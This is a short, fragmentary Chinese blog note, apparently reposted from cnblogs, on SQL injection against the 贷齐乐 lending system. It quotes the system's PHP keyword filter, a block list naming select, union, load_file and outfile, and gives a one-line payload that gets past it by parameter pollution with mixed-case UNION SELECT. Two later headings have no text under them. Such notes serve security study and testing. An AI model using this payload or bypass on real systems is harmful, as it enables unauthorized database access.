标签:
一、注入
1、绕过WAF
(1)、贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)
防注入类,GET/POST/REQUEST/COOKIE等请求都将经过这个类过滤~
$check= eregi(‘select|insert|update|delete|\‘|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile‘, $str); $string = str_replace(array(‘&‘, ‘"‘, ‘<‘, ‘>‘,‘(‘,‘)‘), array(‘&‘, ‘"‘, ‘<‘, ‘>‘,‘(‘,‘)‘), $string);
利用hpp+php小特性,绕过EXP:
user_id=-1 UnioN sElECt 1,2,3&user.id= 123123
(2)
2、二次注入
标签:
原文地址:http://www.cnblogs.com/tyomcat/p/5548105.html
